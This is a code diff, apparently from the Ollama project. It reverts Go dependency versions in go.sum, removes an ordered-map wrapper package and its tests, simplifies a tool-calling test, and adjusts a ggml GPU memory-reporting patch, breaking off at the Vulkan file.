golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA= golang.org/x/exp v0.0.0-20190121172915-509febef88a4/go.mod h1:CJ0aWSM057203Lf6IL+f9T1iT9GByDxfZKAQTCR3kQA=
@ -264,8 +255,6 @@ golang.org/x/mod v0.1.1-0.20191105210325-c90efee705ee/go.mod h1:QqPTAvyqsEbceGzB
golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.2.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.3.0/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA= golang.org/x/mod v0.4.2/go.mod h1:s0Qsj1ACt9ePp/hMypM3fl4fZqREWJwdYDEqhRiZZUA=
golang.org/x/mod v0.30.0 h1:fDEXFVZ/fmCKProc/yAXXUijritrDzahmwwefnjoPFk=
golang.org/x/mod v0.30.0/go.mod h1:lAsf5O2EvJeSFMiBxXDki7sCgAxEUcZHXoXMKT4GJKc=
golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180724234803-3673e40ba225/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20180826012351-8a410e7b638d/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4= golang.org/x/net v0.0.0-20190108225652-1e06a53dbb7e/go.mod h1:mL1N/T3taQHkDXs73rZJwtUhF3w3ftmwwsq0BUmARs4=
@ -278,8 +267,8 @@ golang.org/x/net v0.0.0-20200822124328-c89045814202/go.mod h1:/O7V0waA8r7cgGh81R
golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU= golang.org/x/net v0.0.0-20201021035429-f5854403a974/go.mod h1:sp8m0HH+o8qH0wwXwYZr8TS3Oi6o0r6Gce1SSxlDquU=
golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM= golang.org/x/net v0.0.0-20210405180319-a5a99cb37ef4/go.mod h1:p54w0d4576C0XHj96bSt6lcn1PtDYWL6XObtHCRCNQM=
golang.org/x/net v0.0.0-20210614182718-04defd469f4e/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y= golang.org/x/net v0.0.0-20210614182718-04defd469f4e/go.mod h1:9nx3DQGgdP8bBQD5qxJ1jj9UTztislL4KSBs9R2vV5Y=
golang.org/x/net v0.46.0 h1:giFlY12I07fugqwPuWJi68oOnpfqFnJIJzaIIm2JVV4= golang.org/x/net v0.38.0 h1:vRMAPTMaeGqVhG5QyLJHqNDwecKTomGeqbnfZyKlBI8=
golang.org/x/net v0.46.0/go.mod h1:Q9BGdFy1y4nkUwiLvT5qtyhAnEHgnQ/zd8PfU6nc210= golang.org/x/net v0.38.0/go.mod h1:ivrbrMbzFq5J41QOQh0siUuly180yBYtLp+CKbEaFx8=
golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U= golang.org/x/oauth2 v0.0.0-20180821212333-d2e6202438be/go.mod h1:N/0e6XlmueqKjAGxoOufVs8QHGRruUQn6yWY3a++T0U=
golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw= golang.org/x/oauth2 v0.0.0-20200107190931-bf48bf16ab8d/go.mod h1:gOpvHmFTYa4IltrdGE7lF6nIHvwfUNPOp7c8zoXwtLw=
golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20180314180146-1d60e4601c6f/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
@ -289,8 +278,8 @@ golang.org/x/sync v0.0.0-20190423024810-112230192c58/go.mod h1:RxMgew5VJxzue5/jJ
golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20190911185100-cd5d95a43a6e/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20201020160332-67f06af15bc9/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM= golang.org/x/sync v0.0.0-20210220032951-036812b2e83c/go.mod h1:RxMgew5VJxzue5/jJTE5uejpjVlOe/izrB70Jof72aM=
golang.org/x/sync v0.17.0 h1:l60nONMj9l5drqw6jlhIELNv9I0A4OFgRsG9k2oT9Ug= golang.org/x/sync v0.12.0 h1:MHc5BpPuC30uJk597Ri8TV3CNZcTLu6B6z4lJy+g6Jw=
golang.org/x/sync v0.17.0/go.mod h1:9KTHXmSnoGruLpwFjVSX0lNNA75CykiMECbovNTZqGI= golang.org/x/sync v0.12.0/go.mod h1:1dzgHSNfp02xaA81J2MS99Qcpr2w7fw1gpm99rleRqA=
golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20180830151530-49385e6e1522/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY= golang.org/x/sys v0.0.0-20190215142949-d0b11bdaac8a/go.mod h1:STP8DvDyc/dI5b8T5hshtkjS+E42TnysNCUPdjciGhY=
golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs= golang.org/x/sys v0.0.0-20190312061237-fead79001313/go.mod h1:h1NjWce9XRLGQEsW7wpKNCjG9DtNlClVuFLEZdDNbEs=
@ -306,17 +295,17 @@ golang.org/x/sys v0.0.0-20210510120138-977fb7262007/go.mod h1:oPkhp1MJrh7nUepCBc
golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.0.0-20210630005230-0f9fa26af87c/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.5.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg= golang.org/x/sys v0.6.0/go.mod h1:oPkhp1MJrh7nUepCBck5+mAzfO9JrbApNNgaTdGDITg=
golang.org/x/sys v0.37.0 h1:fdNQudmxPjkdUTPnLn5mdQv7Zwvbvpaxqs831goi9kQ= golang.org/x/sys v0.36.0 h1:KVRy2GtZBrk1cBYA7MKu5bEZFxQk4NIDV6RLVcC8o0k=
golang.org/x/sys v0.37.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks= golang.org/x/sys v0.36.0/go.mod h1:OgkHotnGiDImocRcuBABYBEXf8A9a87e/uXjp9XT3ks=
golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo= golang.org/x/term v0.0.0-20201126162022-7de9c90e9dd1/go.mod h1:bj7SfCRtBDWHUb9snDiAeCFNEtKQo2Wmx5Cou7ajbmo=
golang.org/x/term v0.36.0 h1:zMPR+aF8gfksFprF/Nc/rd1wRS1EI6nDBGyWAvDzx2Q= golang.org/x/term v0.30.0 h1:PQ39fJZ+mfadBm0y5WlL4vlM7Sx1Hgf13sMIY2+QS9Y=
golang.org/x/term v0.36.0/go.mod h1:Qu394IJq6V6dCBRgwqshf3mPF85AqzYEzofzRdZkWss= golang.org/x/term v0.30.0/go.mod h1:NYYFdzHoI5wRh/h5tDMdMqCqPJZEuNqVR5xJLd/n67g=
golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ= golang.org/x/text v0.3.0/go.mod h1:NqM8EUOU14njkJ3fqMW+pc6Ldnwhi/IjpwHt7yyuwOQ=
golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.3/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.5/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ= golang.org/x/text v0.3.6/go.mod h1:5Zoc/QRtKVWzQhOtBMvqHzDpF6irO9z98xDceosuGiQ=
golang.org/x/text v0.30.0 h1:yznKA/E9zq54KzlzBEAWn1NXSQ8DIp/NYMy88xJjl4k= golang.org/x/text v0.23.0 h1:D71I7dUrlY+VX0gQShAThNGHFxZ13dGLBHQLVl1mJlY=
golang.org/x/text v0.30.0/go.mod h1:yDdHFIX9t+tORqspjENWgzaCVXgk0yYnYuSZ8UzzBVM= golang.org/x/text v0.23.0/go.mod h1:/BLNzu4aZCJ1+kcD0DNRotWKage4q2rGVAg4o22unh4=
golang.org/x/tools v0.0.0-20180525024113-a5b4c53f6e8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20180525024113-a5b4c53f6e8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20180917221912-90fa682c2a6e/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ= golang.org/x/tools v0.0.0-20190114222345-bf090417da8b/go.mod h1:n7NCudcB/nEzxVGmLbDWY5pfWTLqBcC2KZ6jyYvM4mQ=
@ -330,8 +319,8 @@ golang.org/x/tools v0.0.0-20200130002326-2f3ba24bd6e7/go.mod h1:TB2adYChydJhpapK
golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE= golang.org/x/tools v0.0.0-20200619180055-7c47624df98f/go.mod h1:EkVYQZoAsY45+roYkvgYkIh4xh/qjgUK9TdY2XT94GE=
golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA= golang.org/x/tools v0.0.0-20210106214847-113979e3529a/go.mod h1:emZCQorbCU4vsT4fOWvOPXz4eW1wZW4PmDk9uLelYpA=
golang.org/x/tools v0.1.4/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk= golang.org/x/tools v0.1.4/go.mod h1:o0xws9oXOQQZyjljx8fwUC0k7L1pTE6eaCbjGeHmOkk=
golang.org/x/tools v0.38.0 h1:Hx2Xv8hISq8Lm16jvBZ2VQf+RLmbd7wVUsALibYI/IQ= golang.org/x/tools v0.30.0 h1:BgcpHewrV5AUp2G9MebG4XPFI1E2W41zU1SaqVA9vJY=
golang.org/x/tools v0.38.0/go.mod h1:yEsQ/d/YK8cjh0L6rZlY8tgtlKiBNTL14pGDJPJpYQs= golang.org/x/tools v0.30.0/go.mod h1:c347cR/OJfw5TI+GfX7RUPNMdDRRbjvYTS0jPyvsVtY=
golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20190717185122-a985d3407aa7/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191011141410-1b5146add898/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=
golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0= golang.org/x/xerrors v0.0.0-20191204190536-9bdfabe68543/go.mod h1:I/5z698sn9Ka8TeJc9MKroUUfqBBauWjQqLJ2OPfmY0=

View File

@ -11,15 +11,6 @@ import (
"github.com/ollama/ollama/api" "github.com/ollama/ollama/api"
) )
// testPropsMap creates a ToolPropertiesMap from a map (convenience function for tests)
func testPropsMap(m map[string]api.ToolProperty) *api.ToolPropertiesMap {
props := api.NewToolPropertiesMap()
for k, v := range m {
props.Set(k, v)
}
return props
}
func TestAPIToolCalling(t *testing.T) { func TestAPIToolCalling(t *testing.T) {
initialTimeout := 60 * time.Second initialTimeout := 60 * time.Second
streamTimeout := 60 * time.Second streamTimeout := 60 * time.Second
@ -66,12 +57,12 @@ func TestAPIToolCalling(t *testing.T) {
Parameters: api.ToolFunctionParameters{ Parameters: api.ToolFunctionParameters{
Type: "object", Type: "object",
Required: []string{"location"}, Required: []string{"location"},
Properties: testPropsMap(map[string]api.ToolProperty{ Properties: map[string]api.ToolProperty{
"location": { "location": {
Type: api.PropertyType{"string"}, Type: api.PropertyType{"string"},
Description: "The city and state, e.g. San Francisco, CA", Description: "The city and state, e.g. San Francisco, CA",
}, },
}), },
}, },
}, },
}, },

View File

@ -1,94 +0,0 @@
// Package orderedmap provides a generic ordered map that maintains insertion order.
// It wraps github.com/wk8/go-ordered-map/v2 to encapsulate the dependency.
package orderedmap
import (
"encoding/json"
"iter"
orderedmap "github.com/wk8/go-ordered-map/v2"
)
// Map is a generic ordered map that maintains insertion order.
type Map[K comparable, V any] struct {
om *orderedmap.OrderedMap[K, V]
}
// New creates a new empty ordered map.
func New[K comparable, V any]() *Map[K, V] {
return &Map[K, V]{
om: orderedmap.New[K, V](),
}
}
// Get retrieves a value by key.
func (m *Map[K, V]) Get(key K) (V, bool) {
if m == nil || m.om == nil {
var zero V
return zero, false
}
return m.om.Get(key)
}
// Set sets a key-value pair. If the key already exists, its value is updated
// but its position in the iteration order is preserved. If the key is new,
// it is appended to the end.
func (m *Map[K, V]) Set(key K, value V) {
if m == nil {
return
}
if m.om == nil {
m.om = orderedmap.New[K, V]()
}
m.om.Set(key, value)
}
// Len returns the number of entries.
func (m *Map[K, V]) Len() int {
if m == nil || m.om == nil {
return 0
}
return m.om.Len()
}
// All returns an iterator over all key-value pairs in insertion order.
func (m *Map[K, V]) All() iter.Seq2[K, V] {
return func(yield func(K, V) bool) {
if m == nil || m.om == nil {
return
}
for pair := m.om.Oldest(); pair != nil; pair = pair.Next() {
if !yield(pair.Key, pair.Value) {
return
}
}
}
}
// ToMap converts to a regular Go map.
// Note: The resulting map does not preserve order.
func (m *Map[K, V]) ToMap() map[K]V {
if m == nil || m.om == nil {
return nil
}
result := make(map[K]V, m.om.Len())
for pair := m.om.Oldest(); pair != nil; pair = pair.Next() {
result[pair.Key] = pair.Value
}
return result
}
// MarshalJSON implements json.Marshaler. The JSON output preserves key order.
func (m *Map[K, V]) MarshalJSON() ([]byte, error) {
if m == nil || m.om == nil {
return []byte("null"), nil
}
return json.Marshal(m.om)
}
// UnmarshalJSON implements json.Unmarshaler. The insertion order matches the
// order of keys in the JSON input.
func (m *Map[K, V]) UnmarshalJSON(data []byte) error {
m.om = orderedmap.New[K, V]()
return json.Unmarshal(data, &m.om)
}

View File

@ -1,348 +0,0 @@
package orderedmap
import (
"encoding/json"
"slices"
"testing"
)
func TestMap_BasicOperations(t *testing.T) {
m := New[string, int]()
// Test empty map
if m.Len() != 0 {
t.Errorf("expected Len() = 0, got %d", m.Len())
}
v, ok := m.Get("a")
if ok {
t.Error("expected Get on empty map to return false")
}
if v != 0 {
t.Errorf("expected zero value, got %d", v)
}
// Test Set and Get
m.Set("a", 1)
m.Set("b", 2)
m.Set("c", 3)
if m.Len() != 3 {
t.Errorf("expected Len() = 3, got %d", m.Len())
}
v, ok = m.Get("a")
if !ok || v != 1 {
t.Errorf("expected Get(a) = (1, true), got (%d, %v)", v, ok)
}
v, ok = m.Get("b")
if !ok || v != 2 {
t.Errorf("expected Get(b) = (2, true), got (%d, %v)", v, ok)
}
v, ok = m.Get("c")
if !ok || v != 3 {
t.Errorf("expected Get(c) = (3, true), got (%d, %v)", v, ok)
}
// Test updating existing key preserves position
m.Set("a", 10)
v, ok = m.Get("a")
if !ok || v != 10 {
t.Errorf("expected Get(a) = (10, true), got (%d, %v)", v, ok)
}
if m.Len() != 3 {
t.Errorf("expected Len() = 3 after update, got %d", m.Len())
}
}
func TestMap_InsertionOrderPreserved(t *testing.T) {
m := New[string, int]()
// Insert in non-alphabetical order
m.Set("z", 1)
m.Set("a", 2)
m.Set("m", 3)
m.Set("b", 4)
// Verify iteration order matches insertion order
var keys []string
var values []int
for k, v := range m.All() {
keys = append(keys, k)
values = append(values, v)
}
expectedKeys := []string{"z", "a", "m", "b"}
expectedValues := []int{1, 2, 3, 4}
if !slices.Equal(keys, expectedKeys) {
t.Errorf("expected keys %v, got %v", expectedKeys, keys)
}
if !slices.Equal(values, expectedValues) {
t.Errorf("expected values %v, got %v", expectedValues, values)
}
}
func TestMap_UpdatePreservesPosition(t *testing.T) {
m := New[string, int]()
m.Set("first", 1)
m.Set("second", 2)
m.Set("third", 3)
// Update middle element
m.Set("second", 20)
var keys []string
for k := range m.All() {
keys = append(keys, k)
}
// Order should still be first, second, third
expected := []string{"first", "second", "third"}
if !slices.Equal(keys, expected) {
t.Errorf("expected keys %v, got %v", expected, keys)
}
}
func TestMap_MarshalJSON_PreservesOrder(t *testing.T) {
m := New[string, int]()
// Insert in non-alphabetical order
m.Set("z", 1)
m.Set("a", 2)
m.Set("m", 3)
data, err := json.Marshal(m)
if err != nil {
t.Fatalf("Marshal failed: %v", err)
}
// JSON should preserve insertion order, not alphabetical
expected := `{"z":1,"a":2,"m":3}`
if string(data) != expected {
t.Errorf("expected %s, got %s", expected, string(data))
}
}
func TestMap_UnmarshalJSON_PreservesOrder(t *testing.T) {
// JSON with non-alphabetical key order
jsonData := `{"z":1,"a":2,"m":3}`
m := New[string, int]()
if err := json.Unmarshal([]byte(jsonData), m); err != nil {
t.Fatalf("Unmarshal failed: %v", err)
}
// Verify iteration order matches JSON order
var keys []string
for k := range m.All() {
keys = append(keys, k)
}
expected := []string{"z", "a", "m"}
if !slices.Equal(keys, expected) {
t.Errorf("expected keys %v, got %v", expected, keys)
}
}
func TestMap_JSONRoundTrip(t *testing.T) {
// Test that unmarshal -> marshal produces identical JSON
original := `{"zebra":"z","apple":"a","mango":"m","banana":"b"}`
m := New[string, string]()
if err := json.Unmarshal([]byte(original), m); err != nil {
t.Fatalf("Unmarshal failed: %v", err)
}
data, err := json.Marshal(m)
if err != nil {
t.Fatalf("Marshal failed: %v", err)
}
if string(data) != original {
t.Errorf("round trip failed: expected %s, got %s", original, string(data))
}
}
func TestMap_ToMap(t *testing.T) {
m := New[string, int]()
m.Set("a", 1)
m.Set("b", 2)
regular := m.ToMap()
if len(regular) != 2 {
t.Errorf("expected len 2, got %d", len(regular))
}
if regular["a"] != 1 {
t.Errorf("expected regular[a] = 1, got %d", regular["a"])
}
if regular["b"] != 2 {
t.Errorf("expected regular[b] = 2, got %d", regular["b"])
}
}
func TestMap_NilSafety(t *testing.T) {
var m *Map[string, int]
// All operations should be safe on nil
if m.Len() != 0 {
t.Errorf("expected Len() = 0 on nil map, got %d", m.Len())
}
v, ok := m.Get("a")
if ok {
t.Error("expected Get on nil map to return false")
}
if v != 0 {
t.Errorf("expected zero value from nil map, got %d", v)
}
// Set on nil is a no-op
m.Set("a", 1)
if m.Len() != 0 {
t.Errorf("expected Len() = 0 after Set on nil, got %d", m.Len())
}
// All returns empty iterator
var keys []string
for k := range m.All() {
keys = append(keys, k)
}
if len(keys) != 0 {
t.Errorf("expected empty iteration on nil map, got %v", keys)
}
// ToMap returns nil
if m.ToMap() != nil {
t.Error("expected ToMap to return nil on nil map")
}
// MarshalJSON returns null
data, err := json.Marshal(m)
if err != nil {
t.Fatalf("Marshal failed: %v", err)
}
if string(data) != "null" {
t.Errorf("expected null, got %s", string(data))
}
}
func TestMap_EmptyMapMarshal(t *testing.T) {
m := New[string, int]()
data, err := json.Marshal(m)
if err != nil {
t.Fatalf("Marshal failed: %v", err)
}
if string(data) != "{}" {
t.Errorf("expected {}, got %s", string(data))
}
}
func TestMap_NestedValues(t *testing.T) {
m := New[string, any]()
m.Set("string", "hello")
m.Set("number", 42)
m.Set("bool", true)
m.Set("nested", map[string]int{"x": 1})
data, err := json.Marshal(m)
if err != nil {
t.Fatalf("Marshal failed: %v", err)
}
expected := `{"string":"hello","number":42,"bool":true,"nested":{"x":1}}`
if string(data) != expected {
t.Errorf("expected %s, got %s", expected, string(data))
}
}
func TestMap_AllIteratorEarlyExit(t *testing.T) {
m := New[string, int]()
m.Set("a", 1)
m.Set("b", 2)
m.Set("c", 3)
m.Set("d", 4)
// Collect only first 2
var keys []string
for k := range m.All() {
keys = append(keys, k)
if len(keys) == 2 {
break
}
}
expected := []string{"a", "b"}
if !slices.Equal(keys, expected) {
t.Errorf("expected %v, got %v", expected, keys)
}
}
func TestMap_IntegerKeys(t *testing.T) {
m := New[int, string]()
m.Set(3, "three")
m.Set(1, "one")
m.Set(2, "two")
var keys []int
for k := range m.All() {
keys = append(keys, k)
}
// Should preserve insertion order, not numerical order
expected := []int{3, 1, 2}
if !slices.Equal(keys, expected) {
t.Errorf("expected %v, got %v", expected, keys)
}
}
func TestMap_UnmarshalIntoExisting(t *testing.T) {
m := New[string, int]()
m.Set("existing", 999)
// Unmarshal should replace contents
if err := json.Unmarshal([]byte(`{"new":1}`), m); err != nil {
t.Fatalf("Unmarshal failed: %v", err)
}
_, ok := m.Get("existing")
if ok {
t.Error("existing key should be gone after unmarshal")
}
v, ok := m.Get("new")
if !ok || v != 1 {
t.Errorf("expected Get(new) = (1, true), got (%d, %v)", v, ok)
}
}
func TestMap_LargeOrderPreservation(t *testing.T) {
m := New[string, int]()
// Create many keys in specific order
keys := make([]string, 100)
for i := range 100 {
keys[i] = string(rune('a' + (99 - i))) // reverse order: 'd', 'c', 'b', 'a' (extended)
if i >= 26 {
keys[i] = string(rune('A'+i-26)) + string(rune('a'+i%26))
}
}
for i, k := range keys {
m.Set(k, i)
}
// Verify order preserved
var resultKeys []string
for k := range m.All() {
resultKeys = append(resultKeys, k)
}
if !slices.Equal(keys, resultKeys) {
t.Error("large map should preserve insertion order")
}
}

View File

@ -20,10 +20,10 @@ fix vulkan PCI ID and ID handling
ggml/src/ggml-cuda/vendors/hip.h | 3 + ggml/src/ggml-cuda/vendors/hip.h | 3 +
ggml/src/ggml-impl.h | 8 + ggml/src/ggml-impl.h | 8 +
ggml/src/ggml-metal/ggml-metal.cpp | 2 + ggml/src/ggml-metal/ggml-metal.cpp | 2 +
ggml/src/ggml-vulkan/ggml-vulkan.cpp | 169 +++++++- ggml/src/ggml-vulkan/ggml-vulkan.cpp | 169 ++++++++-
ggml/src/mem_hip.cpp | 558 +++++++++++++++++++++++++++ ggml/src/mem_hip.cpp | 529 +++++++++++++++++++++++++++
ggml/src/mem_nvml.cpp | 209 ++++++++++ ggml/src/mem_nvml.cpp | 209 +++++++++++
9 files changed, 1005 insertions(+), 17 deletions(-) 9 files changed, 976 insertions(+), 17 deletions(-)
create mode 100644 ggml/src/mem_hip.cpp create mode 100644 ggml/src/mem_hip.cpp
create mode 100644 ggml/src/mem_nvml.cpp create mode 100644 ggml/src/mem_nvml.cpp
@ -58,7 +58,7 @@ index d55aed348..99ae293cc 100644
set_target_properties(ggml-base PROPERTIES set_target_properties(ggml-base PROPERTIES
diff --git a/ggml/src/ggml-cuda/ggml-cuda.cu b/ggml/src/ggml-cuda/ggml-cuda.cu diff --git a/ggml/src/ggml-cuda/ggml-cuda.cu b/ggml/src/ggml-cuda/ggml-cuda.cu
index 6852d2e20..334a30135 100644 index 6852d2e20..48cdb1dcf 100644
--- a/ggml/src/ggml-cuda/ggml-cuda.cu --- a/ggml/src/ggml-cuda/ggml-cuda.cu
+++ b/ggml/src/ggml-cuda/ggml-cuda.cu +++ b/ggml/src/ggml-cuda/ggml-cuda.cu
@@ -267,6 +267,16 @@ static ggml_cuda_device_info ggml_cuda_init() { @@ -267,6 +267,16 @@ static ggml_cuda_device_info ggml_cuda_init() {
@ -109,7 +109,7 @@ index 6852d2e20..334a30135 100644
+ +
+#if defined(GGML_USE_HIP) +#if defined(GGML_USE_HIP)
+ if (ggml_hip_mgmt_init() == 0) { + if (ggml_hip_mgmt_init() == 0) {
+ int status = ggml_hip_get_device_memory(ctx->pci_bus_id.c_str(), free, total, ctx->integrated != 0); + int status = ggml_hip_get_device_memory(ctx->pci_bus_id.c_str(), free, total);
+ if (status == 0) { + if (status == 0) {
+ GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_bus_id.c_str(), *free, *total); + GGML_LOG_DEBUG("%s device %s utilizing AMD specific memory reporting free: %zu total: %zu\n", __func__, ctx->pci_bus_id.c_str(), *free, *total);
+ ggml_hip_mgmt_release(); + ggml_hip_mgmt_release();
@ -204,7 +204,7 @@ index 4e162258d..d89e35a8e 100644
#define cudaErrorPeerAccessAlreadyEnabled hipErrorPeerAccessAlreadyEnabled #define cudaErrorPeerAccessAlreadyEnabled hipErrorPeerAccessAlreadyEnabled
#define cudaErrorPeerAccessNotEnabled hipErrorPeerAccessNotEnabled #define cudaErrorPeerAccessNotEnabled hipErrorPeerAccessNotEnabled
diff --git a/ggml/src/ggml-impl.h b/ggml/src/ggml-impl.h diff --git a/ggml/src/ggml-impl.h b/ggml/src/ggml-impl.h
index fe57d4c58..dba8f4695 100644 index fe57d4c58..1c07e767a 100644
--- a/ggml/src/ggml-impl.h --- a/ggml/src/ggml-impl.h
+++ b/ggml/src/ggml-impl.h +++ b/ggml/src/ggml-impl.h
@@ -677,6 +677,14 @@ static inline bool ggml_can_fuse_subgraph(const struct ggml_cgraph * cgraph, @@ -677,6 +677,14 @@ static inline bool ggml_can_fuse_subgraph(const struct ggml_cgraph * cgraph,
@ -216,7 +216,7 @@ index fe57d4c58..dba8f4695 100644
+GGML_API int ggml_nvml_get_device_memory(const char *uuid, size_t *free, size_t *total); +GGML_API int ggml_nvml_get_device_memory(const char *uuid, size_t *free, size_t *total);
+GGML_API void ggml_nvml_release(); +GGML_API void ggml_nvml_release();
+GGML_API int ggml_hip_mgmt_init(); +GGML_API int ggml_hip_mgmt_init();
+GGML_API int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total, bool is_integrated_gpu); +GGML_API int ggml_hip_get_device_memory(const char *id, size_t *free, size_t *total);
+GGML_API void ggml_hip_mgmt_release(); +GGML_API void ggml_hip_mgmt_release();
+ +
#ifdef __cplusplus #ifdef __cplusplus
@ -243,7 +243,7 @@ index ba95b4acc..f6f8f7a10 100644
/* .async = */ true, /* .async = */ true,
/* .host_buffer = */ false, /* .host_buffer = */ false,
diff --git a/ggml/src/ggml-vulkan/ggml-vulkan.cpp b/ggml/src/ggml-vulkan/ggml-vulkan.cpp diff --git a/ggml/src/ggml-vulkan/ggml-vulkan.cpp b/ggml/src/ggml-vulkan/ggml-vulkan.cpp
